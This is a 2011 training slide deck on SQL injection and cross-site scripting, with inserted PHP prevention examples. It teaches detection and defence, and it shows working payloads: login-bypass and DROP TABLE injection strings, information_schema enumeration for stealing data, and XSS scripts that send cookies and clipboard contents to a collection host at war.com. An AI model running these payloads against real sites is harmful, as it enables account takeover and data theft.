
Understanding SQL Injection (Prevention Mechanism)

Adzmely Mansor adzmely@gmail.com

Tuesday, May 17, 2011

Purpose
understanding SQL injection
pen-testing existing internal applications
good practices / methods for SQL injection prevention in programming

Not a license to KILL !!!

SQL Injection
However strong the firewall rules are, the attack easily walks through port 80

Inserting SQL meta-characters/commands into web based input methods: {GET, POST}

Well known and exploited technique

SQL Injection
(diagram) Malicious User -> Firewall, port 80/443 -> Web Server
Openly launch attack from compromised server

A Threat?
Albert Gonzalez: 130 million credit card numbers
Used the SQL injection technique
Stole data from internal corporate networks
Sentenced to 20 years in March 2010
Ex-informer to the US Secret Service to catch hackers

A Threat?

Sept 19, 2010: during the Swedish General Election a voter attempted a code injection as part of a write-in vote.

SQL Injection? How?


http://victim.org/news.php?id=234
SELECT * FROM News where news_id = $_GET[id]
SELECT * FROM News where news_id = 234

SQL Injection? How?


http://victim.org/news.php?id=234 and 1=1
SELECT * FROM News where news_id = $_GET[id]
SELECT * FROM News where news_id = 234 and 1=1

Sample Attacks
comments / inline comments: admin'--
select username,password where username='admin'--' and password='pass';

Sample Attacks
comments / inline comments: ' or 1=1--
select username,password where username='admin' and password='' or 1=1--';

SQL Injection: 3 types


Inband: data extracted using the same channel
Out-of-band: data extracted using a different channel - email, observation
Inferential: no actual data transfer, only behaviour is observed

Blind SQL Injection


results not visible to the attacker
logical statements used to attack
time consuming / intensive
heavy load on the web server from a single source IP
automation tools - sqlmap/sqlplus/etc

Blind SQL Injection


Conditional test: and 1=1 / and 1=2
Conditional errors: select 1/0 from users where username='user1';
Time delay: measure execution time

Vulnerability Testing
GET/POST methods
unescaped numerical value
single quote unescaped string
double quotes unescaped string
etc

Vulnerability Testing
look for page errors? - 500 Server Error, redirect page?
SQL/ODBC errors
page differences: and 1=1-- , and 1=2--

Test for SQL Injection


unescaped numerical: select * from news where id = $_GET[id]
add some SQL statement / blind?
?id=23 and / ?id=23 and {1=1,1=2}
error? differences?

Test for SQL Injection


unescaped numerical: open the Lesson 1a URL, do some tests, try to detect the SQL injection vulnerability, try to exploit it

Test for SQL Injection


unescaped numerical with addslashes() or magic quotes?
select * from news where id = addslashes($_GET[id])
try to do the same test on the Lesson 1b URL: injectable?

Test for SQL Injection


unescaped single quote: select * from news where id = '$_GET[id]'
using a single quote to produce an error / differences (blind technique)
try to inject with some simple

Test for SQL Injection


unescaped single quote: open the Lesson 2a URL, do some tests, try to detect the SQL injection vulnerability, try to exploit it

Test for SQL Injection


unescaped double quotes: select * from news where id = "$_GET[id]"
using a single quote to produce an error / differences (blind technique)
try to inject with some simple

Test for SQL Injection


unescaped double quotes: open the Lesson 2b URL, do some tests, try to detect the SQL injection vulnerability, try to exploit it

Test for SQL Injection


unescaped statement with parentheses: update users set password=md5('$_POST[pass]') where id = ....
injectable: pass = abc'); --

Test for SQL Injection


POST method: open the Lesson 3 URL, do some tests, try to detect the SQL injection vulnerability

In Band: Stealing Data


getting the table list
finding how many columns are in the query: use union select
finding the database name: MySQL database() function in union select
use the MySQL information_schema tables
use group_concat in the query

In Band: Stealing Data


finding how many columns are in the query using ORDER BY: ORDER BY 1--, ORDER BY 2--, ORDER BY 3--, ...
an error means the number of selected columns has been found

In Band: Stealing Data


finding how many columns are in the query using union + select
use dummy strings to find the number of columns in the query

In Band: Stealing Data


using group_concat: SELECT group_concat(name) from users;
returns the query data in a single column

In Band: Stealing Data


getting the table list from information_schema.tables
SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'dbname';

In Band: Stealing Data


getting the table columns from information_schema.columns
SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = 'tname';

In Band: Stealing Data


Exercise: open any previous Lesson URL and retrieve passwords from un-named tables in the same DB

Stacking Queries

'; drop table users; --
supported / not supported / unknown

Random Test
Choose your internal website, search for SQL injection possibilities, do some penetration testing

SQL Injection Tools


sqlmap: Python based CLI (command line interface), fully automated penetration test, DB fingerprinting, DB and table enumeration

Prevention
Whose responsibility?
No SQL database, connector, or framework can prevent SQL injection all the time
Security is the application developer's job

Monitoring
Never reveal error messages
Example error shown to the visitor:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
INSERT INTO user (username, password, admin) VALUES ('Mr. O'Neil', 'password', false);
<?php if (! $query) { die ("Error: " . mysql_error()); } ....
Not only does this confuse/anger the visitor, but it reveals sensitive information about your application

This is BAD

Monitoring
Error handling: never show errors in production; log errors so they can be fixed, or email them
Check regularly: this way you will see potential bugs / security holes, and you can fix them promptly.

Log Error
    function sql_failure_handler($query, $error) {
        // Log the full query and error for the developers, never show it to the visitor
        $msg = htmlspecialchars("Failed Query: {$query}<br>SQL Error: {$error}");
        error_log($msg, 3, "/home/site/logs/sql_error_log");
        if (defined("debug")) {
            return $msg;
        }
        return "Requested page is temporarily unavailable, please try again later.";
    }
    mysql_query($query) or die(sql_failure_handler($query, mysql_error()));

Prevention
Escaping Input Prevents SQL Injection.


Prevention
Is simply adding addslashes() or magic_quotes enough?
$id = addslashes($_GET['id']) ?

Escaping & Filtering


    <?php
    $id = $_GET['id'];
    $category = $_GET['category'];
    $sql = "SELECT * from News WHERE id = {$id} AND category = '{$category}'";
    mysql_query($sql) or die(sql_failure_handler($sql, mysql_error()));

Escaping & Filtering


SELECT * from News WHERE id = 254 AND category = 'ict'
type casting - integer
escape special characters by using a backslash

Escaping & Filtering


    <?php
    $id = (int) $_GET['id'];
    $category = mysql_real_escape_string($_GET['category']);
    $sql = "SELECT * from News WHERE id = {$id} AND category = '{$category}'";
    mysql_query($sql) or die(sql_failure_handler($sql, mysql_error()));

Escaping Methods
mysql_real_escape_string()
addslashes()
Class/object methods such as PDO $pdo->quote() - not available to all DB types !!!
Multiple escaping methods? No. One is enough!

Prevention
using addslashes()? - unescaped numerical
$qry = "SELECT * FROM tblTest WHERE TestID = " . addslashes($_GET['id']);
What does addslashes() do? Problem solved?

Prevention
using mysql_real_escape_string()? - on unescaped numerical
$sql = "SELECT * FROM tblTest WHERE TestID=" . mysql_real_escape_string($_GET['id']);
What does mysql_real_escape_string() do? Problem solved?

Prevention
unescaped numerical - use type casting: (int) $_GET['id']

Magic Quotes
Cannot simply rely on Magic Quotes
Turning on Magic Quotes will not solve all your problems - eg: unescaped numerical variables

Prevention
Quoting all arguments: since single quotes are always escaped; however, for numericals always use numeric casting
Combined with addslashes() or mysql_real_escape_string(), this technique prevents SQL injection

Like Quandary
SELECT * messages WHERE subject LIKE '{$sub}%'
% is used as a wildcard; _ (underscore) represents any single character
$sub = mysql_real_escape_string('%_') is still '%_' - no changes

Like Quandary
large amount of data queried, more memory usage, slows down the database, slows down the process / server: possibility of Denial of Service (DoS) attack

Like Quandary
Solution - addcslashes() with custom escaped characters
$sub = addcslashes(mysql_real_escape_string('%something...'), '%_');

The Best Solution


Use placeholders/parameters - eg: PHP MySQL/PDO
    $stmt = $pdo->prepare("SELECT * FROM fruit WHERE name = ?");
    $stmt->execute(array("Apple"));

You don't need to deal with escaping data because it's done by the PDO library.

Code quality also increases:
No more nasty concatenation
No more hoping every programmer escaped the query properly

Parameter Placeholder
Query needs a dynamic value: SELECT * from News WHERE id = 254   (254 is the user input)

Parameter Placeholder
Query parameter takes the place of the dynamic value: SELECT * from News WHERE id = ?   (? is the parameter placeholder)

Parameter Placeholder
How the database parses it (parse tree):
    query
      SELECT expr-list
      FROM simpletable: News
      WHERE expr: equality: id = ?   <- parameter placeholder

Parameter Placeholder
How the database executes it (parse tree):
    query
      SELECT expr-list
      FROM simpletable: News
      WHERE expr: equality: id = 254   <- parameter value

Parameter Placeholder
Interpolation: the user input is pasted into the SQL text (parse tree):
    query
      SELECT expr-list: *
      FROM simpletable: News
      WHERE expr: OR
        equality: id = 254
        254   <- SQL Injection: the input changed the shape of the tree

Parameter Placeholder
How the database executes it with a parameter (parse tree):
    query
      SELECT expr-list
      FROM simpletable: News
      WHERE expr: equality: id = "254 OR TRUE"   <- parameter value
no parameter can change the tree

Parameter Placeholder

Query Parameter Prevent SQL Injection.


Whitelist Map
http://example.org/news.php?sort=date&dir=up
    <?php
    $sortorder = $_GET['sort'];   // unsafe
    $direction = $_GET['dir'];    // unsafe
    $sql = "SELECT * FROM News ORDER BY {$sortorder} {$direction}";   // sql injection
    $query = mysql_query($sql);

Whitelist Map
Fix with a Whitelist Map
    <?php
    $sortorders = array('status' => 'status', 'date' => 'sysdate');
    $directions = array('up' => 'ASC', 'down' => 'DESC');
    $sortorder_default = 'status';
    $direction_default = 'ASC';

Whitelist Map
Map User Input to Safe SQL
    <?php
    if (isset($sortorders[$_GET['sort']])) {
        $sortorder = $sortorders[$_GET['sort']];
    } else {
        $sortorder = $sortorder_default;
    }

Whitelist Map
Map User Input to Safe SQL
    <?php
    if (isset($directions[$_GET['dir']])) {
        $direction = $directions[$_GET['dir']];
    } else {
        $direction = $direction_default;
    }

Whitelist Map
Interpolate Safe SQL
    <?php
    // only whitelisted values are interpolated
    $sql = "SELECT * FROM News ORDER BY {$sortorder} {$direction}";
    $query = mysql_query($sql);
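Added example, not from the slides: one PHP search function that combines the three defences from the Like Quandary, Best Solution and Whitelist Map slides: a PDO placeholder for the data value, addcslashes() for the LIKE wildcards, and the whitelist map for ORDER BY, which a placeholder cannot protect because identifiers are never bindable. The News table, the sort names and the ASC/DESC map follow the slides; the subject column, the function names and the PDO DSN/credentials are this example's assumptions.

```php
<?php
// Added example, not from the original slides. Combines the deck's three
// defences in one function: a PDO placeholder for the data value, addcslashes()
// for the LIKE wildcards, and a whitelist map for ORDER BY (identifiers can
// never be bound as parameters, so the user value must never reach the SQL text).

// Escape the LIKE wildcards so user input can only match literally.
// The bound parameter already stops syntax breakage; this stops "%" or "_"
// from turning a search into a full-table scan (the Like Quandary).
function escape_like(string $value): string
{
    // Backslash is MySQL's default LIKE escape character, so escape it as well.
    return addcslashes($value, '%_\\');
}

// Map the user's sort/dir choices to fixed SQL fragments; anything not in the
// map falls back to the default instead of being interpolated.
function whitelist_order(string $sort, string $dir): string
{
    $sortorders = array('status' => 'status', 'date' => 'sysdate');
    $directions = array('up' => 'ASC', 'down' => 'DESC');
    $sortorder = isset($sortorders[$sort]) ? $sortorders[$sort] : 'status';
    $direction = isset($directions[$dir]) ? $directions[$dir] : 'ASC';
    return "ORDER BY {$sortorder} {$direction}";
}

// Build and run the search. Only whitelisted fragments are interpolated;
// the subject prefix travels as a bound parameter (assumed column: subject).
function search_news(PDO $pdo, string $subject, string $sort, string $dir): array
{
    $sql = "SELECT * FROM News WHERE subject LIKE ? " . whitelist_order($sort, $dir);
    $stmt = $pdo->prepare($sql);
    $stmt->execute(array(escape_like($subject) . '%'));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage with the request values from the slides' URL; the DSN and credentials
// are placeholders for this example.
$pdo = new PDO('mysql:host=localhost;dbname=DBNAME_PLACEHOLDER',
    'USER_PLACEHOLDER', 'PASS_PLACEHOLDER',
    array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION));
// ?q=100%            -> bound as '100\%%' and matches subjects starting with "100%"
// ?sort=date;DROP... -> not a map key, so the default 'status' is used
$rows = search_news($pdo, $_GET['q'] ?? '', $_GET['sort'] ?? '', $_GET['dir'] ?? '');
```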

Prevention
Limited database user access: GRANT specific permissions; DROP, CREATE, etc. should be revoked from the connected DB user

Cross Site Scripting XSS


XSS : Denition
a computer security vulnerability in web applications where information from one context, where it is not trusted, is injected into another context where it is trusted, and an attack can be started from this trusted context

XSS : Example
simple web application that directly outputs the user supplied URL parameter
    <?php echo "Selamat Datang " . $_GET['name'];
open lesson1.php?name=Abu
Selamat Datang Abu

XSS : Example
JavaScript injection:
lesson1.php?name=<script>alert(/XSS/);</script>

XSS Threat
XSS is the most common injection vulnerability
Direct output of user input allows injection of arbitrary content into the website: HTML tags, active content (JavaScript / Flash)
Firewall? via port 80

Reflective XSS
Simplest form of XSS
User input is read from the request parameters and written directly into the output
Included malicious code is executed within the browser
The victim's browser has to execute the XSS-triggering request itself

Persistent XSS
Stored / permanent XSS
User input is read from a request and stored raw in a database, file, etc.
example: comments in a blog

Persistent XSS
The victim's browser visits a website
Stored user input is read from the database and written directly into the output
Embedded malicious code gets executed within the victim's browser

DOM based XSS


Similar to reflective XSS, but the server side doesn't play a role
The fault is within the JavaScript code
The victim's browser must execute the XSS request itself

DOM based XSS


Usually triggered by working with URL parameters / URL anchors in JavaScript
XSS caused by output in HTML context
XSS caused by evaluating - JS eval() injection

XSS Dangers
Displaying annoying pop-ups
Redirect - malware
Modification of text and images (defacement)
Manipulation of client side application logic
Theft of clipboard, cookies, passwords
XSS traverses firewalls - port 80/443

XSS Test
Displaying pop-ups: most commonly used for diagnosis and demonstration of XSS problems
Harmless, just uses the JavaScript alert() function: <script>alert(1);</script>

XSS: Redirection
Used by spammers and the malware industry
Harmless if redirecting for advertisement purposes
Dangerous if redirected to malware / exploits

XSS: Redirection
Just modifies document.location
    <script> document.location = "http://www.malware.org"; </script>

XSS: Cookies Theft


Allows theft of authentication information or session identifiers stored in cookies
Doesn't work with httpOnly cookies

XSS: Cookies Theft


Just send document.cookie to the attacker
    <script>
    tag = '<img src="http://war.com/collect.php?data=';
    tag = tag + escape(document.cookie) + '">';
    document.write(tag)
    </script>

XSS: Clipboard Theft


Allows theft of sensitive data from the user's clipboard
Uses the clipboardData object in Internet Explorer
Triggers a security question since IE 7

XSS: Clipboard Theft


IE 7
    <script>
    myClipBoard = clipboardData.getData("Text");
    tag = '<img src="http://war.com/collect.php?data=';
    tag = tag + escape(myClipBoard) + '">';
    document.write(tag)
    </script>

XSS: Theft of Passwords


Mozilla Firefox comes with a password safe
Known passwords are filled into forms after the page has fully loaded
With XSS, cached passwords can be stolen by attackers

XSS: Manipulating Logic


Example: fill in a support ticket with injectable XSS (persistent method)
Support engineer opens the ticket: steal cookies, change the submit action - onSubmit event handler

Different HTML contexts


Outside of HTML tags
Within HTML tags
Within URL HTML tag attributes
In stylesheet attributes/tags
In JavaScript / JavaScript strings

Injection outside HTML tags


Raw user input is inserted between HTML tags
    <body> ... Hello <?php echo $_GET['name']; ?> ! </body>

Injection of new HTML tags
    <body> ... Hello <script>.....</script> ! </body>

Injection outside HTML tags


Filter function strip_tags() removes HTML tags
    <body> ... Hello <?php echo strip_tags($_GET['name']); ?> ! </body>
In the output all <script> tags are removed

Injection outside HTML tags


The encoding function htmlspecialchars() encodes special characters into HTML entities (or htmlentities())
    <body> ... Hello <?php echo htmlspecialchars($_GET['name']); ?> ! </body>
In the output special chars are disarmed
    <body> ... Hello &lt;script&gt; .... &lt;/script&gt; ! </body>

Injection within HTML tags


Raw user input is inserted within an HTML tag attribute (unquoted, single quoted, double quoted)
    <img src="abc.png" title=<? echo $_GET['a']; ?>>
    <img src="abc.png" title='<? echo $_GET['a']; ?>'>
    <img src="abc.png" title="<? echo $_GET['a']; ?>">

Injection with eg. an event handler
    <img src="abc.png" title=x onmouseover=...>
    <img src="abc.png" title='x' onmouseover=...>
    <img src="abc.png" title="x" onmouseover=...>

Injection within HTML tags


Encoding functions do not protect at all in the case of non-standard HTML
    <img src="abc.png" title=<? echo htmlentities($_GET['a']); ?>>
Injection is always possible because no quotes are used around the attribute value
    <img src="abc.png" title=x onmouseover=...>

Injection within HTML tags


HTML attribute values should be within double quotes
Use encoding functions as protection and encode the appropriate quotes
    <img src="abc.png" title="<? echo htmlentities($_GET['a']); ?>">
Injection is no longer possible because breaking out of the attribute context is not possible

Injection within URL attribute


A raw URL is inserted into an HTML tag URL attribute
    <img src="<?php echo $_GET['a']; ?>">
    <a href="<?php echo $_GET['b']; ?>"> Click Here </a>

Injection: eg. JavaScript URLs
    <img src="javascript: alert(123);">
    <a href="javascript: alert(123);"> Click Here </a>

Injection within URL attribute


To secure the output, encoding functions must be used, but they are not sufficient
The XSS problem here is not the possibility to break out of the attribute value, but the URL type javascript
The input filter should use a whitelist of allowed URL types

Injection in Stylesheet
Raw user input is inserted into style information
Injected are IE expression(), JavaScript URLs or Mozilla's -moz-binding
    <style> a { color: <? echo $_GET['color']; ?>; } </style>
    <style> a { color: expression(alert(1)); } </style>

Injection in Javascript
Raw user input is inserted into JavaScript; the injection is normal JavaScript
    <script> var str = "name: <? echo $_GET['name']; ?>"; document.write(str); </script>
    <script> var str = "name: "; alert(123);//"; document.write(str); </script>
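Added example, not from the slides: one PHP encoder per output context listed above (text between tags and quoted attributes, URL attributes, stylesheet values, JavaScript strings), rendering the slides' snippets with the right protection for each place. The function names are this example's own; htmlspecialchars(), json_encode() and preg_match() are standard PHP.

```php
<?php
// Added example, not from the original slides: one encoder per output context.
// Function names are this example's own; the PHP built-ins are real.

// Text between tags and quoted attribute values: encode <, >, &, " and '.
// ENT_QUOTES also covers the single quote, which htmlentities() leaves alone
// by default (the single-quoted attribute case on the slides).
function enc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// URL attributes: encoding alone cannot stop javascript: URLs, so whitelist the
// URL type first. Only http(s) and site-relative paths survive; the rest becomes "#".
function safe_url(string $url): string
{
    $url = trim($url);
    if (preg_match('#\A(https?://|/(?!/))#i', $url) !== 1) {
        return '#';            // rejected: javascript:, data:, //evil.example, ...
    }
    return enc_html($url);     // still encode quotes so the attribute cannot be closed
}

// Stylesheet value: no encoder makes expression() or url() safe here, so only
// accept a hex colour or a plain colour keyword.
function safe_css_color(string $c): string
{
    return preg_match('/\A(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{1,20})\z/i', $c) === 1 ? $c : 'inherit';
}

// JavaScript string literal: json_encode() emits a quoted, escaped literal; the
// HEX flags also neutralise </script> and quotes inside the string.
function enc_js(string $s): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE;
    return json_encode($s, $flags) ?: '""';
}

// Render the slides' snippets with the encoder that matches each context.
// Request values come from $_GET, as in the original examples.
function render_page(array $get): string
{
    $name  = $get['name']  ?? '';
    $a     = $get['a']     ?? '';
    $b     = $get['b']     ?? '';
    $color = $get['color'] ?? '';
    return '<style> a { color: ' . safe_css_color($color) . '; } </style>' . "\n"
         . '<body> Hello ' . enc_html($name) . ' !' . "\n"
         . '<img src="' . safe_url($a) . '" title="' . enc_html($a) . '">' . "\n"
         . '<a href="' . safe_url($b) . '"> Click Here </a>' . "\n"
         . '<script> var str = "name: " + ' . enc_js($name) . '; document.write(str); </script>' . "\n"
         . '</body>';
}

echo render_page($_GET);
```

With ?name=<script>alert(1)</script>&a=javascript:alert(123)&color=expression(alert(1)) the output contains only entities, a "#" href and "inherit", so none of the slides' payloads reaches a parser in a live position.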

Thank You
http://blog.xjutsu.com adzmely@gmail.com
